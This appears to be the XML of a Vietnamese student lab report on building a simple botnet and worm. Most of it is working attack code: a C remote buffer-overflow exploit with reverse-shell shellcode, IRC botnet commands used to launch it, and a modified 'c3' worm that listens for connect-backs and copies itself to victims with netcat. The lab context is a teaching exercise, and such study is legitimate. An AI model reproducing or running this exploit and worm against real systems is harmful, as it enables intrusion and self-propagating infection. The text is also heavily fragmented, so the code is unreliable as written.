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32ABF619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AA14E4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (Session 0</w:t>
      </w:r>
      <w:r w:rsidR="00AA14E4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256D11A" w14:textId="02E9CE5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8481A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>simple botnet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008D866F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AA14E4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00AA14E4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/20</w:t>
      </w:r>
      <w:r w:rsidR="00AA14E4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7F1B5E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6B3066">
        <w:t>230</w:t>
      </w:r>
      <w:r w:rsidR="009613E4" w:rsidRPr="009613E4">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="006B3066">
        <w:t>N21</w:t>
      </w:r>
      <w:r w:rsidR="007D281E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006B3066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6B3066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6B3066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38834EC8" w:rsidR="008D0072" w:rsidRDefault="006B3066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3950C88D" w:rsidR="008D0072" w:rsidRDefault="006B3066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7F0DFEAD" w:rsidR="008D0072" w:rsidRDefault="006B3066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0BA3A84A" w:rsidR="0027532A" w:rsidRDefault="0027532A" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Kịch bản 0</w:t>
            </w:r>
            <w:r w:rsidR="00AA14E4">
              <w:t>5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482AEE2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9271EF6" w14:textId="393BDA1A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7AE834BB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0C2AD18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0E9884C9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31FE94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719561E2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5E25F784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61B454CC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74CC8B6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7EB159BC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417A67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5723B19" w14:textId="67091E07" w:rsidR="00BA539D" w:rsidRDefault="007D281E" w:rsidP="00B10F13">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 0</w:t>
      </w:r>
      <w:r w:rsidR="00AA14E4">
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887B89D" w14:textId="7682EC04" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Đầu tiên ta sẽ thực hiện code và chỉnh sửa lại chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662CBA9" w14:textId="2008E580" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ta sẽ thay đổi return address thành 0xffffcd3b và đổi địa chỉ push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698C4677" w14:textId="77777777" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00AA14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push   0x87fda8c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631B4538" w14:textId="77777777" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D"/>
    <w:p w14:paraId="154743D3" w14:textId="1C065CE5" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Do địa chỉ đổi thành máy local với ip là 192.168.253.135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C27A884" w14:textId="1150A275" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Code của chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3F204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stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C666FD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string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D69C2E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netdb.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D675E0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&lt;netinet/in.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218F164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BUF_SIZE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064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09564C3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EB6396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hellcod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[]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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4644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31\xc0\x31\xdb\x31\xc9\x51\xb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C47E56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06\x51\xb1\x01\x51\xb1\x02\x5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1D38E36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89\xe1\xb3\x01\xb0\x66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A77F25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89\xc2\x31\xc0\x31\xc9\x51\x5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699590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"\xB9\x11\x11\x11\x11\x81\xF1\x1B\x40\x11\x17\x51\x31\xC9\x66\x68\x11\x5c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F98F2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68\xC0\xA8\xFD\x87\x66\x68\x11\x5C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7F59FB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b1\x02\x66\x51\x89\xe7\xb3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14FBF89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10\x53\x57\x52\x89\xe1\xb3\x03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17C373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b0\x66\xcd\x80\x31\xc9\x39\xc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355EC63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74\x06\x31\xc0\xb0\x01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0FE8182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5F2A17F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b1\x01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82A7A7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cd\x80\x31\xc0\xb0\x3f\x89\xd3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0A95F0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b1\x02\xcd\x80\x31\xc0\x31\xd2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CAF7F0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50\x68\x6e\x2f\x73\x68\x68\x2f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3A960E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2f\x62\x69\x89\xe3\x50\x53\x89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3F72F3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e1\xb0\x0b\xcd\x80\x31\xc0\xb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CDB651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x01\xcd\x80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37C2E76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B34E4A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tandard offset (probably must be modified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4734293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#define RET 0xbffff28b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371E015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 xml:space="preserve"> RET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xffffcd3b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15254E3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335E93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mai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c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*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[]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564007D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>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717AAE4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BUF_SIZE];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7CE9CF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, i, size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7522622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_in remote;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431CFFC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hostent *host;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8CA44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087C3E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argc !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3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4372B1D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221E08F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 xml:space="preserve">"Usage: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%s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 xml:space="preserve"> target-ip port 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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A7625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44A34CC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47C6028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filling buffer with NOPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CD04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memse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,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x9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, BUF_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAE698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713ACB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Modify the connectback ip address and port. In this case, the shellcode connects to 192.168.2.101 on port 17*256+92=4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6FE8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3] = 192;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEEF3C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4] = 168;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B13B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5] = 207;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100098EB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6] = 144;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F73AC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495A74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39] = 17;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E116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hellcode[40] = 92;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742D798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opying shellcode into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9B8C0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 +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90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), shellcode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) -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D56CE1D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662E20E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12B0124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fo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i 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90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; i &lt; BUF_SIZE -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4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; i +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4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07B9428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6938D7C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  *(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*)&amp;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i]) = RET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BADEB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4FFFAC4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[BUF_SIZE -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] =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x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E814C2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getting hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61525F2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host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gethostbynam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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301890B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host ==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NULL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39739B0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230E8B3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 xml:space="preserve">"Unknown Host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%s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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFFC7F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2A7732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3CF85A2F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reating socket...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA8827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s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socke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AF_INET, SOCK_STREAM,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1A1A3FC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s &lt;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711CE07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7BDB76D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Error: Socket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D69FE14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6450A2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31A244B1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tate Protocolfamily , then converting the hostname or IP address, and getting  port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393216B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sin_family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 AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519D365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sin_add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 *(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in_addr *)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hos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-&gt;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h_addr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73B016D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sin_por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htons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atoi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AA14E4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2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]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB2673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onnecting with destination host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502DD6A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onne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, (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 *)&amp;remote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remote)) ==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098FED2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7189C50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4D57E7BE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Error: connect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062545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74A722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1E0A5F98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sending exploit string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0215C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size =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send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, buffer, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA14E4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), 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E091DD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(size ==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1EC9EE8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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D0D12A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3CF51877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sending data failed</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA14E4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AA14E4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1B86FC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AA14E4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AA14E4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3BA46036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  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0BBF53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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// closing socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B7A679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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA14E4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757A4932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AA14E4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6F56E9D0" w14:textId="77777777" w:rsidR="00AA14E4" w:rsidRPr="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00AA14E4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0A25DCE" w14:textId="77777777" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D"/>
    <w:p w14:paraId="1FDFFF57" w14:textId="5D878A1F" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ta sẽ thực hiện build và chạy thử với 2 lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011182EC" w14:textId="1A877737" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>gcc remote</w:t>
      </w:r>
      <w:r w:rsidR="00554259">
        <w:t>exploit.c -o exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346F22B" w14:textId="07905E8B" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="550ED755" wp14:editId="3EBDA29C">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="180149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CEC1" w14:textId="77777777" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D"/>
    <w:p w14:paraId="2D247033" w14:textId="389F896A" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Đồng thời bên máy Ubuntu 14 ta sẽ thực hiện build vul_server và chạy, thì ta nhận được kết quả từ như hình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA452C8" w14:textId="1A68B2CD" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F082C3" wp14:editId="1E57A2E5">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="577702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C0A0" w14:textId="1F76443E" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Tiếp tục ta thực việc dựng lại botnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232F1286" w14:textId="1456F904" w:rsidR="00554259" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ở máy 1 chạy chương trình boss.py</w:t>
      </w:r>
      <w:r w:rsidR="00554259">
        <w:t xml:space="preserve"> bằng lệnh: python boss.py -c kiet -n kiet -x kiet -s euroserv.fr.quakenet.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C27F824" w14:textId="1F577101" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5924DB39" wp14:editId="56198457">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="199266013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013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10A1" w14:textId="7476E842" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ở máy 2 chạy chương trình myworker.py</w:t>
      </w:r>
      <w:r w:rsidR="00554259">
        <w:t xml:space="preserve"> bằng lệnh: python myworker.py -b kiet_508 -s euroserv.fr.quakenet.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B02EC7" w14:textId="78DD7472" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AF358E1" wp14:editId="23FCAE87">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="137572912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2912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6634" w14:textId="5C5EB526" w:rsidR="00AA14E4" w:rsidRDefault="00AA14E4" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Tiếp theo ở máy chính window ta thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00554259">
        <w:t>chạy lệnh !execute run /home/kiet123/exploit 192.168.253.136 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC09048" w14:textId="4E864178" w:rsidR="00554259" w:rsidRDefault="00554259" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C69306" wp14:editId="3DE98B0C">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1115895626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95626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CE41" w14:textId="7B6979C2" w:rsidR="00554259" w:rsidRDefault="00554259" w:rsidP="00BA539D">
      <w:r>
        <w:t>Kiểm tra lại máy Ubuntu 14 ta thấy kết quả đã tấn công thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434BEF71" w14:textId="347DE50A" w:rsidR="00554259" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hơn</w:t>
      </w:r>
      <w:r w:rsidR="00554259">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E21BC17" wp14:editId="4958F7E8">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="3633674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6742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28AF" w14:textId="1BE1E096" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:t>Hơn thế nữa ta còn có thể tấn công và thực hiện lây nhiễm với code c3 worm cải tiến</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A1E00" w14:textId="55B1C86A" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:t>Đầu tiên ta cần cài thêm 1 máy nạn nhân nữa, tiếp theo ta sẽ chỉnh lại code c3 và payload để thực hiện tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEA703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&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E01C5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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC031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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF0F9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&lt;netdb.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A05572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includ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&lt;netinet/in.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EDBB2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031994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generate 2 shellcode with different IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D288B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hellcode1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[]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31\xc0\x31\xdb\x31\xc9\x51\xb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CD3D6B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6\x51\xb1\x01\x51\xb1\x02\x5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15E0BA2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89\xe1\xb3\x01\xb0\x66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951738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89\xc2\x31\xc0\x31\xc9\x51\x5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4CAFA2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"\xB8\x1B\x40\x11\x17\x35\x11\x11\x11\x11\x50\x31\xC0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECB09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68\xC0\xA8\xFD\x87\x66\x68\x11\x5C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8408B9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b1\x02\x66\x51\x89\xe7\xb3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F390DA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10\x53\x57\x52\x89\xe1\xb3\x03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ACDB72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b0\x66\xcd\x80\x31\xc9\x39\xc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30F92EB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74\x06\x31\xc0\xb0\x01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280DAA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0450DB7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b1\x0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CFF15F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cd\x80\x31\xc0\xb0\x3f\x89\xd3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0FA094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b1\x02\xcd\x80\x31\xc0\x31\xd2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343E31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50\x68\x6e\x2f\x73\x68\x68\x2f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E6C609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2f\x62\x69\x89\xe3\x50\x53\x89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1EC3772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e1\xb0\x0b\xcd\x80\x31\xc0\xb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4BBDC57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1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4A4E357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565BCA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hellcode2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[]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31\xc0\x31\xdb\x31\xc9\x51\xb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1B03CCE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6\x51\xb1\x01\x51\xb1\x02\x5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BD9940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89\xe1\xb3\x01\xb0\x66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51010D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89\xc2\x31\xc0\x31\xc9\x51\x5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34636C6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"\xB8\x1B\x40\x11\x16\x35\x11\x11\x11\x11\x50\x31\xC0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542E39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68\xC1\xA8\xFD\x87\x66\x68\x11\x5C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22203D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b1\x02\x66\x51\x89\xe7\xb3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DF9AC0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10\x53\x57\x52\x89\xe1\xb3\x03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E49D52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b0\x66\xcd\x80\x31\xc9\x39\xc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183D53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74\x06\x31\xc0\xb0\x01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997B64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C37F7E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31\xc0\xb0\x3f\x89\xd3\xb1\x01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7A2EA21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cd\x80\x31\xc0\xb0\x3f\x89\xd3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A0D8DF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b1\x02\xcd\x80\x31\xc0\x31\xd2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250C4AB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50\x68\x6e\x2f\x73\x68\x68\x2f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39B56B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2f\x62\x69\x89\xe3\x50\x53\x89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5959F36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e1\xb0\x0b\xcd\x80\x31\xc0\xb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</w:p>
    <w:p w14:paraId="6ADBC99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           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1\xcd\x80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0CD102B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961F92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standard offset (probably must be modified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9F27E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RET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xffffcd3b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC9A1C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BUFFER_SIZE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024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344F39B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NAME_SIZE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2048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E66CC3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#define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 xml:space="preserve"> BUF_SIZE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064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B561E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179A16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global variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4232A98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_in my_srv;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9DFB6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024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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C27F1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ignal =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791E1E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*ip_victim;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529356B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et_server;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7973A75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64E7992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exploit function to send buffer to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB8AB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Exploi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*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ip_victim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port_victim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1E36747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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1FB49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declare variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6065F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finish declare variables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6339AE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exploit_buffe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[BUF_SIZE];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CA6D4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, i, size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CF231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hostent *host;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4981410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_in remote;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA995E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AE93E6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filling buffer with NOPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C9E5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generating exploit buffer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0C24033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emse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exploit_buffer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x9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, BUF_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B4BA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CB1881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signal ==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51BE354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090E4EE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exploit_buffer +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90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-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1), shellcode1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1) -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04F63F5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75E9191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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A74667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2E8AC3D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exploit_buffer +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90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-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2), shellcode2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hellcode2) -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C889B5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3FBC89A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EF9FA8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finish copying shellcode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70DCB1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735F3D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3BD89D4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01697A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adding return address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7DC4492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fo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i =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90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; i &lt; BUF_SIZE -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4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; i +=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4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6E37C14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6BFD989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    *(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*)&amp;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exploit_buffe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[i]) = RET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD347F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167DE09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exploit_buffe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[BUF_SIZE -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] =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x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761D204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finish adding return address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66BF21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6338CD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create hostname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02ADD85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62512DB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getting hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5484F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host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gethostbynam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ip_victim);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E491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2FC6717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create socket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6AFAA21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reating socket...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2A16D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s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ocke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AF_INET, SOCK_STREAM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65BBFE8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s &lt;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781FECC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7BCCBFC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Error: Socket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78E5210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0930381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19E4DFF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C71BCA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reate remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E76E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create remote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6D03827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AB0B1D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state Protocolfamily , then converting the hostname or IP address, and getting  port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A3A8A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sin_famil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AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8ABC5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sin_add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*(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in_addr *)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hos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-&gt;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h_add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0167C74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remot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sin_por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htons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port_victim);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05556DD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connect to remote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3964035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CE1CA7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onnecting with destination host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D21940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onne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s, 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 *)&amp;remote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remote)) ==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5C394F2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1D9E46E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5C12436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Error: connect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3B00D6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3FED32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71F660F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send exploit buffer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3F3DF7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DD0C75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sending exploit string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7C897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size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en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, exploit_buffer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exploit_buffer)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DB31FF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size ==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6BDDBF8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3509DA3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5604412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sending data failed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7C4517B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01AC96F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5527309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losing socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8085B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s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C96EBC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74DF84B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3DF3111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0E434A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voi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heckSocketServe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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC5414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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365899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reate socket server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B84E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socket_server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ocke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AF_INET, SOCK_STREAM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70643B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661C84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heck if socket is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004D607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socket_server &lt;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337A040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6AF8673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f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tder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Error: Socket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69D855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741085D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38EC386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593D1F2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8E0596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voi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heckMySrv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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1CC0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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C468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reate my_srv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587ADF7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my_srv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sin_famil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AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDCC9E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my_srv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sin_add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s_add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INADDR_ANY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3B6B2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my_srv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.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sin_por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htons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4444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B8B94B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24D4CB2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bind socket to port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12828A7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bin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socket_server, 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 *)&amp;my_srv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my_srv)) ==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35077F6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>    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB0644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erro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Error: bind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3903859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72868C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4448E80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listen to port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFAE5F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liste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socket_server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3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 ==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2354BA6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0480B9F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erro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Error: listen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96A444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CCAC0B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69512E8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6A722A3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8CB270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voi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*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Liste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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A5DCB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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A120F4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listen to port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E1281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Listening port 4444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5CB68D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7812D2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heck socket server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AE54D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heckSocketServe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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F87E0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heckMySrv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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330719C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273B15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announce finish listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B683C1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finish listen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08D6092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162941D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7CF521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send worm to victim using netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778DCBD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voi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NetCatSendWorm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clie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byte_siz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15D1145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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11068B4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infection announcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4318E5D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Starting connect from victim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D35A5B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E245EE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sending shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459F84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pwd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A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5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A96510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byte_size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en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client, buffer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5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3AE2FF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C73BF3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byte_size &lt;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1F7BBE0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693607F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8DC0DA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0D05B79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byte_size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recv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client, buffer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izeo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)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F60B422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byte_size &lt;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2BEB507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7D7BF14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6E4F6A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68D7633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buffe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[byte_size -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] =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2A06538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FBF495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get into dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E877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Starting the infection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350DFA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lastRenderedPageBreak/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sleep(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A05B9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2E66E7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send worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D29D24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nc -l 10000 &gt;c3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A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7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874ED6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byte_size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en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client, buffer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7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8C4225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7665DF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Sending the worm to exploit the machine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D2F97F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5E579E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send worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8376D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 xml:space="preserve">"nc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%s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 xml:space="preserve"> 10000 &lt;c3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A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, ip_victim);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117274E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ystem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buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFBFCF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4236B6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hmod 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDC8E7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chmod 777 c3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A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4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1520D4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byte_size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en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client, buffer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4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03D315B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3F4A93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execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0C11A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emcpy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buffer,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./c3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x0A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6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60ECEE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byte_size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sen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client, buffer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6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124181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00BDB9C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098BAA7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infecting function to send buffer to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E17FF3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voi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*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Infe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void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*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pt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09A6876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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A484C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4686BFC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declare variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A77137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byte_size, client, client_size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0531EF6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_in cli_struct;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BB21D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10DBE2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announce infection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5745770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Start infecting the machine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EF30CC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6D3CDBB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reating socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C6F87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client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accep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socket_server, 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struc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sockaddr *)&amp;cli_struct, &amp;client_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3637C5F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client == -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14B2D73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2BF8540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erro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Error: accept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70BD00C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1DD31FB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4774987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F09865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netcat send worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B73762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NetCatSendWorm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client, byte_size);</w:t>
      </w:r>
    </w:p>
